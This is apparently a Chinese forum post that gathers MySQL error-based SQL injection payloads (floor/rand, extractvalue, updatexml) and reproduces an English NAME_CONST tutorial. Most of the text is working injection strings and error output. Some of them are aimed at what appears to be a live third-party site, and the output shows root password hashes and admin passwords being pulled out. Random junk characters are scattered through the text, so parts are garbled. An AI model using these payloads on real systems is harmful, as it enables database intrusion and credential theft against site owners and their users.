|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
) S0 Q9 O1 q) q/ @; \6 f9 M首先进行正常查询: mysql> select * from article where id = 1;+ {& [% D# b+ `9 T
+—-+——-+———+
* d8 `: ?2 {4 E$ U c4 p6 q! t3 e& i" V| id | title | content |
; u. c7 _) x$ _% X' B% ~: z8 E+—-+——-+———+, h% k7 v) T# K3 X9 M2 Y5 p7 J
| 1 | test | do it |
" U2 z: m" r0 d% {+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
, x: O6 E4 Z- I& ~" D7 W* P* E# VERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
- \ a0 r1 o$ q) F4 X! E例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
" B) G& D b# o; xERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));$ |4 r% ^/ O" ?' @. I3 n. K& D9 w: X
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue- i0 c2 U5 `/ l: x
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
+ r) a7 D$ s7 p J6 o8 O) a) tERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ' G4 ^& x( f" {9 [
; v; L0 I5 p0 H# b' ]4 s/ e
再收集: 5 e( W+ }# q: p/ x( w3 N: M
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) % {) H5 j- [* \2 ]: p5 k. e5 P" D0 j
) h% |% l+ B3 m5 pError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’4 Y& {6 n4 _( d; ^
+ c6 o! G( O7 u3 o' K/ {2 |
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)" I8 W C+ e( C- r2 C/ H6 V4 }9 p, ^
. I1 F L# Y; p VErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
0 F6 P0 u1 _8 I7 s. @& e$ T
4 F ]- S# i; c$ t+ |& Q3 mMYSQL高版本报错注入技巧-利用NAME_CONST注入7 k9 c4 R* k4 g* z# @# a% w. G( T
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. # g4 j- x ]% h
) ]! r. d" l; u& ]2 V- z
) y( I n& d5 Y& i/ j; a相关信息# g9 m; S; e( ]- `1 S5 a
7 N! u9 U9 A P
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
; Y- L+ i1 b" {5 z
- Q1 m P4 U C) e! d" uCode:
2 O, h1 {* }) O: C& X4 |: o. DNAME_CONST(DATA, VALUE)
* o4 J& t; X0 O# {& A1 p0 A
' g! b- G! Y( G0 NReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
/ u" j- W% v6 j# G5 P
& U* z, m! t# N" v u0 L, L( rSELECT NAME_CONST('TEST', 1); T2 F+ t" A7 r3 x9 ~
/ Y0 b, E1 ]7 y4 `% c: ~/ \+ C& d
3 M: p. c- f% ~* t|---------------|) Q7 I* b: S) a- m; X0 `! a
| TEST |
2 ^, F6 r( J. c; z7 }/ [| |
: Q( l* U0 b" }$ u; N7 ]$ h6 n|---------------|5 R; i4 n5 W9 ~4 p( V, I0 q
| 1 |7 H, v7 g/ p2 X1 ^8 U. N7 B, h
| |
) N9 Q4 Q1 t. Y6 f|---------------|6 ^' n8 S4 W5 l2 S. X( k
7 u. i& W7 u+ s# L" u, z/ W9 o
8 E7 k, U. f* F' X- \! [/ G3 E. K& o5 ^4 s/ |* M; [8 b G8 ~
F. y) t9 t0 O8 t8 w4 M+ Yhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const8 P. z7 Q6 G h0 \9 F6 i
Intro to MySQL Variables
6 P( c& K- {% k( p) H& F0 }/ \4 x# s/ Y
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
/ ]2 O6 N' X9 P" d7 k
: k, ~1 l0 G" G3 dCode:" ]2 o6 b$ Z( P
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261+ W- Q3 Q* e$ x' h: e0 I: h- M
# O; p8 t4 [4 \2 w2 B$ V9 V# W/ }& f. r4 m$ p( k: ^7 e
0 X, X& F) o$ C% y8 _- c0 M! |# ?; ?# |( `
. e: @, B% c3 _' h# uCode:5 \1 E5 G0 j7 d3 Q9 ]
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--; J9 d0 o8 u1 o2 F0 I& ?+ A
# }; k& B! m1 F" Y% C" w6 r
3 J. ^# [ l) N( Y% B$ _ hVAR = Your MySQL variable.
" x8 S6 b' y7 }! C+ u
6 A. G- j. V# o3 w/ gMySQL 5.1.3 Server System Variables
+ i" |1 C! j& B+ I: \/ P: x, u; l# n4 o
Let's try it out on my site..$ Q3 M: \% S# d I4 b' N V
3 y6 q. r3 |+ A
Code:
3 G7 g8 z6 \ L0 a& X4 p, G% Lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--1 S7 C1 i6 h$ W$ d0 r
9 g( w& z2 K$ k5 nErroruplicate column name '5.0.27-community-nt': i9 u8 v: V2 @3 d$ }
+ [) i5 F7 V% L# s3 z
7 ~( h X5 r! F, Z# {7 J
( F& S2 c& h0 Z5 g+ |1 k r8 x
9 D' ]% v s$ P1 h
3 C) T/ t! J8 C- {Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
9 a8 l# u! t* F5 V
' L, A: K# r8 {9 i" @+ ~, fData Extraction
0 n9 {" h& W* |8 n, t0 j [3 ^9 m3 x/ q! j3 l5 F
Code:9 {, s9 u9 a! {! @" c' J% _# f& U# U
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--+ _' k1 Z' _4 n8 }
! i2 u1 _7 `3 X; x
0 [& t3 e1 i7 S) RWe should get a duplicate column 1 error...' V ]) h2 `1 }: @/ }
- ~# J3 K0 O, [2 x) z B
Code:; s% y. ?1 k: c- j3 f$ K% {# X
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--$ |) b8 c4 v* ]$ d4 R' W+ v
+ Q) G' r* o, o5 l7 eErroruplicate column name '1 @+ r6 Y3 j6 Y# e" S( a) t3 g
2 D5 N4 o6 J3 k _7 L7 L0 g6 U6 _& A
, r% K \7 }. k/ M" A3 s' x5 x
6 S# M: Y) t9 z8 u$ R6 i
9 Y3 I0 l: F* E$ m1 @9 x" ]. [/ A* Q; |. B
Now let's get the tables out this bitch.., {. S6 b5 h. `* C7 w3 u
! x0 t: S! e, p, u; T# k2 \. {Code:
$ E) N& P( d# W, W* k# ~/ P$ C$ n; @" d5 L5 w+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
) x P: F1 r2 T6 }& W
' \9 [' ?% D/ N2 D2 q
6 N8 H) v+ F M. VLet's see if it works here, if it does, we can go on and finish the job.
& }! n* L; |5 c2 g) ]" e
( `6 N4 a* u6 }% P- bCode:
/ }3 |9 n6 a8 s& Nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
+ W. T( W2 p$ c9 l5 e
8 X- G! K1 h2 T0 p6 O& M" b/ E' G3 c! P" i0 e8 I
Erroruplicate column name 'com_admanage
, p2 L( L- i0 S; m' h" {
( ^) A( |0 f; J+ J
g h9 h$ s6 k0 p4 p1 E
7 Q& i2 h8 U5 {* N
) s; P3 h4 x; q' P) c" h" ` B. f# w Q9 c1 q# L- S# v. N
: u- X% N G o5 ~/ Z ]Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.- ?& H1 I4 ? B6 z6 W `) D
9 J4 S, P1 E* b t3 p
Let's get the columns out of the user table..- c2 W6 N; d7 v, I! A6 r3 h t1 h
) {$ m# O5 i p0 \2 PCode:/ e! F0 K8 U# D; ^5 ?* q' Z
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--, {1 B/ i i% t U- i8 R
( ^5 y6 \: p0 Z+ {* U4 _! S# R
0 x3 a9 ]# n* X. ^( ISo mine looks like this, and I get the duplicate column name 'Host'.
) E- z" N2 i" n9 H+ s" f
" d& v' `4 o# D8 r+ Q. D GCode:
% ^ w! L; ?6 thttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--4 z! F& {& A# a! S+ ~- Y$ L% N
/ x0 f: c5 A$ d0 E# Q: ]) b1 _( Q
Erroruplicate column name 'Host' u, z2 U" s9 L/ j/ i+ d
! Y& W# n6 Q0 z3 e. |8 b. O7 `. f" M+ `
$ c& a9 Q- h3 Q2 w
/ q% t4 z. U8 a7 p: [6 E! i- Q* H4 m
. c. S6 l& Z, [) e, v5 d8 i; B& W/ ~6 Y( F1 o6 }2 h
Woot, time to finish this bitch off.4 S5 K" v' `5 K/ Q6 @. l$ e2 ?1 }
7 S- ~6 \, `) C. g, k+ Y9 ?( i
Code:
# S% W3 Z5 K1 k+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--. Y+ L; Q1 C, d
4 E9 {1 r5 C9 r
' U; \- Z& h- b6 U2 T2 X2 U) P9 Y
So mine looks like this...8 g8 h; P. Y u8 @! f
& u4 Y" D& ?" h: ]8 F" y( H4 LCode:
# e& d3 }2 c2 bhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
% q' J, z: p% `
5 M+ g N; w; d7 jErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'2 }7 h7 }& _0 n4 Y
& Q- n- s7 r# L+ I& g4 P( S
# J0 n" M2 P9 C% g$ e 1 u+ g+ ^7 r8 \
: @0 s; S9 ?3 e# t5 h$ r/ g+ i# J1 Y, u3 j& r H/ G
. `6 m+ n# B* K ^* e" i5 O# SAnd there we have it, thanks for reading.
C) Q6 ]; i- }
: m4 s; i/ m1 [/ a |
发表于 2015-11-11 19:03:37
收藏
支持
反对